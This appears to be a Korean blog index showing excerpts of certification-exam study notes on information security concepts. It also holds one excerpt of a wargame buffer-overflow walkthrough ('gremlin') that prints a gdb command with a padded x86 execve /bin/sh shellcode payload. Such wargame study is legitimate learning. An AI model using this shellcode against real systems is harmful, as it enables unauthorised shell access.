본문 바로가기

전체 글229

필수기출1200 ~ 710 난이도 중상-상 시작 601. 가용성 - 정보는 지속적으로 변화하고 인가된 자가 접근할 수 있어야 한다 무결성 - 기술 : 접근제어, 메시지 인증 602. 시스템은 정상적으로 지속되지만 메시지 송신자나 수신자에게 해를 입힐수 있는 공격 => 도청, 트래픽 분석 603. 비정상적인 일이 발생할 수 있는 "가능성" => 위험 + 위협 : 정보시스템에 해를 끼치는 사건 및 행동 604. 하나의 암호 테스트를 둘 이상의 방법으로 해독하는 정보보안 형식 논쟁 대상이 되는 메시지를 상대에게 숨기거나 거부하기 위해 사용된다 => 거부적 암호화deniable / 가짜 키를 제공하여 가짜 평문을 복호화하도록 하여 비밀성 보장 605. 동기식 스트림 암호 - 암호화 복호화 상호 동기화 필수 - 전송도중 변조되어도 복호화 .. 2024. 6. 17.
필수기출1200 ~ 600 507. User01이 S 테이블을 생성한 후 동료인 Staff01에게 S테이블 레코드를 볼 수 있도록 접근권한을 부여한다 => GRANT SELECT ON S TO Staff01 ( 읽기 권한 = SELECT ) 508. 데이터베이스 키 유형 여러 개의 후보키 중에서 기본키로 선정되고 남은 나머지 키 => Alternate Key 대체키 + Candidate Key 후보키  509. DB 보안 위협 요소 : 추론 대응책 : 다중 인스턴스화(다중 사례화 Polyinstantiation). 두 가지 버전의 동일 객체를 생성하여 낮은 수준 주체가 실제 정보를 알지 못하게 하고 거짓정보를 제공하여 추론에 대응한다 510. DB 보안통제기법 추론제어 - 간접적으로 노출된 데이터를 통해 다른 데이터를 추론하지 못.. 2024. 6. 17.
정보보안3 6차시 쉘코드 모음 : https://pwnable-study.tistory.com/44 첫 번째 문제인 gremlin256바이트 배열 변수 사용본래 gremlin 파일은 권한때문에 gdb로 실행불가이 때 cp로 파일을 복사하여 복사한 파일로 gdb를 실행함 (gdb) r $(python -c 'print "\x41"*210 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" + "\x90"*26 + "AAAA"') => gdb를 실행할 때 python으로 문자열을 반복하여 넣는다 \x41은 A\x90은 NOP 코드를 의미한다 변수 크기가 256바이트이므로A 210개, 쉘코드 24바이.. 2024. 6. 16.
필수기출1200 ~ 506 444.UTM (Unified Threat Management)- 다양한 보안 솔루션을 하나의 장비에 탑재하여 운영하는 all in one 통합보안솔루션- 보안 정책, 필터링 시그니처를 통합 관리. 445.NAC 주요기능- 접근제어 및 인증- PC 및 네트워크 장치 통제- 해킹, 웜, 유해 트래픽 차단- 백신, 패치, 자산 관리- 내부 직원 역할 기반의 접근제어 446.SIEM 프로그램- Splunk, QRadar, Arcsight, HPE ArcSight, LogRhythm + Encase : 포렌식 조사 및 분석 소프트웨어 447.SOA, SIRP, TIP를 폭넓게 포함하는 개념유입되는 위험에 대해 대응레벨을 자동으로 분류표준화된 업무 프로세스에 따라 사람과 기계가 유기적으로 협력할수있도록 지원하는 .. 2024. 6. 16.